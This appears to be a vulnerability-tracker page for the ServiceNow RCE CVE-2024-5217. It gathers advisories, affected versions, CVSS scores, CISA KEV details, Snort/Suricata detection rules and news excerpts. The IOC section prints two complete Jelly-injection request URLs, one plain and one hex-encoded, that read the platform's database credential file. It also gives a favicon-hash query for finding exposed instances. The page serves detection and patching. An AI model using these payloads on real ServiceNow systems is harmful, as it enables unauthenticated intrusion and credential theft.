CVE-2024-5217
published 2024-07-10CVE-2024-5217: ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-08-19
Exploited in the wild
EPSS
99.63%
99.9th percentile
ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| servicenow | now_platform | < Utah Patch 10 Hot Fix 3 | Utah Patch 10 Hot Fix 3 |
| servicenow | now_platform | < Utah Patch 10a Hot Fix 2 | Utah Patch 10a Hot Fix 2 |
| servicenow | now_platform | < Utah Patch 10b Hot Fix 1 | Utah Patch 10b Hot Fix 1 |
| servicenow | now_platform | < Vancouver Patch 6 Hot Fix 2 | Vancouver Patch 6 Hot Fix 2 |
| servicenow | now_platform | < Vancouver Patch 7 Hot Fix 3b | Vancouver Patch 7 Hot Fix 3b |
| servicenow | now_platform | < Vancouver Patch 8 Hot Fix 4 | Vancouver Patch 8 Hot Fix 4 |
| servicenow | now_platform | < Vancouver Patch 9 Hot Fix 1 | Vancouver Patch 9 Hot Fix 1 |
| servicenow | now_platform | < Vancouver Patch 10 | Vancouver Patch 10 |
| servicenow | now_platform | < Washington DC Patch 1 Hot Fix 3b | Washington DC Patch 1 Hot Fix 3b |
| servicenow | now_platform | < Washington DC Patch 2 Hot Fix 2 | Washington DC Patch 2 Hot Fix 2 |
| servicenow | now_platform | < Washington DC Patch 3 Hot Fix 2 | Washington DC Patch 3 Hot Fix 2 |
| servicenow | now_platform | < Washington DC Patch 4 | Washington DC Patch 4 |
| servicenow | now_platform | < Washington DC Patch 5 | Washington DC Patch 5 |
| servicenow | servicenow | — | — |
| servicenow | servicenow | — | — |
| servicenow | servicenow | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E↗
url/login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/login.do"; startswith; content:"jvar_page_title|3d|"; distance:0; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; content:"j|3a|jelly|20|xmlns|3a|j|3d 22|jelly|3a|core|22 20|xmlns|3a|g|3d 27|glide|27|"; within:80; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060429; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Exploit targets GET /login.do with jvar_page_title parameter containing URL-encoded Jelly template injection (<j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>...) to achieve unauthenticated RCE. Look for this parameter in HTTP GET requests to /login.do. ↗
- →POST variant also observed: attacker POSTs to /login.do with jvar_page_title= in the request body containing javascript or style tags. Monitor POST body for 'jvar_page_title=' combined with 'javascript' or 'style' keywords. ↗
- →Successful exploitation response contains the string 'glide.db.user' in the HTTP response body, indicating database credential file (glide.db.properties) was read. Use this as a response-side detection indicator. ↗
- →Exploitation involves a two-stage payload: first stage checks for a specific result in the server response, second stage checks database contents and dumps user lists and account credentials (often hashed, sometimes plaintext). ↗
- →CVE-2024-5217 is chained with CVE-2024-4879 and CVE-2024-5178 for full database access. Detections for any one of these three CVEs should trigger investigation for the others. ↗
- →Use Shodan query http.favicon.hash:"1701804003" or FOFA query icon_hash=1701804003 to enumerate internet-exposed ServiceNow instances for attack surface mapping. ↗
- →The vulnerability is in the GlideExpression script component. Monitor for Jelly template syntax (j:jelly, g:evaluate, xmlns:j="jelly:core") appearing in any HTTP parameter on ServiceNow endpoints. ↗
- ·ServiceNow-hosted (SaaS) instances received fixes earlier on May 14, 2024, before the June/July 2024 patch cycle. Self-hosted/on-premises instances require manual patching. Verify patch status per deployment type. ↗
- ·Affected platform versions include Utah, Vancouver, and Washington DC Now Platform releases. Ensure patching covers all three named release trains. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.2CRITICALCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.2CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5xx6-pf4v-cpf2: ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases
ghsa_unreviewed·2024-07-10
CVE-2024-5217 [CRITICAL] CWE-184 GHSA-5xx6-pf4v-cpf2: ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases
ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
VulnCheck
ServiceNow Incomplete List of Disallowed Inputs Vulnerability
vulncheck·2024·CVSS 9.2
CVE-2024-5217 [CRITICAL] CWE-184 ServiceNow Incomplete List of Disallowed Inputs Vulnerability
ServiceNow Incomplete List of Disallowed Inputs Vulnerability
ServiceNow Washington DC, Vancouver, and earlier Now Platform releases contain an incomplete list of disallowed inputs vulnerability in the GlideExpression script. An unauthenticated user could exploit this vulnerability to execute code remotely.
Affected: ServiceNow Utah, Vancouver, and Washington DC Now Platform
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-07-20&host_type=src&vulnerability=cve-2024-5217; https://www.imperva.com/blog/imperva-customers-protected-against-critical-servicenow-vulnerability/; https://www.cisa.gov/sites/default/
VulnCheck
ServiceNow Improper Input Validation Vulnerability
vulncheck·2024·CVSS 9.3
CVE-2024-4879 [CRITICAL] CWE-1287 ServiceNow Improper Input Validation Vulnerability
ServiceNow Improper Input Validation Vulnerability
ServiceNow Utah, Vancouver, and Washington DC Now Platform releases contain a jelly template injection vulnerability in UI macros. An unauthenticated user could exploit this vulnerability to execute code remotely.
Affected: ServiceNow Utah, Vancouver, and Washington DC Now Platform
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.imperva.com/blog/imperva-customers-protected-against-critical-servicenow-vulnerability/; https://www.resecurity.com/blog/article/cve-2024-4879-and-cve-2024-5217-servicenow-rce-exploitation-in-a-global-reconnaissance-campaign; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabili
CISA
ServiceNow Incomplete List of Disallowed Inputs Vulnerability
cisa·2024-07-29·CVSS 9.2
CVE-2024-5217 [CRITICAL] CWE-184 ServiceNow Incomplete List of Disallowed Inputs Vulnerability
Vulnerability: ServiceNow Incomplete List of Disallowed Inputs Vulnerability
Affected: ServiceNow Utah, Vancouver, and Washington DC Now Platform
ServiceNow Washington DC, Vancouver, and earlier Now Platform releases contain an incomplete list of disallowed inputs vulnerability in the GlideExpression script. An unauthenticated user could exploit this vulnerability to execute code remotely.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313; https://nvd.nist.gov/vuln/detail/CVE-2024-5217
Remediation Due Date: 2024-08-19
Suricata
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2
suricata·2025-02-27·CVSS 9.2
CVE-2024-5217 [CRITICAL] ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_
Suricata
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4
suricata·2025-02-27·CVSS 9.2
CVE-2024-5217 [CRITICAL] ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/login.do"; startswith; content:"jvar_page_title|3d|"; distance:0; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; content:"j|3a|jelly|20|xmlns|3a|j|3d 22|jelly|3a|core|22 20|xmlns|3a|g|3d 27|glide|27|"; within:80; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060429; rev:1; me
Suricata
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M1
suricata·2025-02-27·CVSS 9.2
CVE-2024-5217 [CRITICAL] ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M1
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M1
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; content:"j|3a|jelly|20|xmlns|3a|j|3d 22|jelly|3a|core|22 20|xmlns|3a|g|3d 27|glide|27|"; within:80; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060406; rev:
Suricata
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M3
suricata·2025-02-27·CVSS 9.2
CVE-2024-5217 [CRITICAL] ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M3
ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M3
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M3"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/login.do"; startswith; content:"jvar_page_title|3d|"; distance:0; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060428; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27
Nuclei
ServiceNow - Incomplete Input Validation
nuclei·CVSS 9.2
CVE-2024-5217 [CRITICAL] ServiceNow - Incomplete Input Validation
ServiceNow - Incomplete Input Validation
ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
Template:
id: CVE-2024-5217
info:
name: ServiceNow - Incomplete Input Validation
author: DhiyaneshDk,ritikchaddha
severity: critical
description: |
ServiceNow has addressed an input validation vulnerability that was identified in the Was
Greynoiseio
Resurgence of In-The-Wild Activity Targeting Critical ServiceNow Vulnerabilities
blogs_greynoiseio·2025-03-18·CVSS 9.3
[CRITICAL] Resurgence of In-The-Wild Activity Targeting Critical ServiceNow Vulnerabilities
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Checkpoint
29th July – Threat Intelligence Report
blogs_checkpoint·2024-07-29
CVE-2024-32484 29th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 29th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th July, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
The Superior Court of Los Angeles was forced to shut down its network following a ransomware attack. The court, the largest in the United States, has closed all of its 36 courthouse locations due to the attack for a few days. No ransomware group has publicly claimed responsibility for the attack.
American cybersecurity firm Kn
Bleepingcomputer
Critical ServiceNow RCE flaws actively exploited to steal credentials
blogs_bleepingcomputer·2024-07-25·CVSS 9.3
[CRITICAL] Critical ServiceNow RCE flaws actively exploited to steal credentials
## Critical ServiceNow RCE flaws actively exploited to steal credentials
## Bill Toulas
Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks.
This malicious activity was reported by Resecurity , which, after monitoring it for a week, identified multiple victims, including government agencies, data centers, energy providers, and software development firms.
Although the vendor released security updates for the flaws on July 10, 2024, tens of thousands of systems potentially remain vulnerable to attacks.
## Exploitation details
ServiceNow is a cloud-based platform that helps organizations manage digital workflows for enterprise operations.
It is widely adopted across various industri
https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313https://www.darkreading.com/cloud-security/patchnow-servicenow-critical-rce-bugs-active-exploithttps://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313https://www.darkreading.com/cloud-security/patchnow-servicenow-critical-rce-bugs-active-exploithttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-5217
2024-07-10
Published
2024-07-29
Added to CISA KEV
Exploited in the wild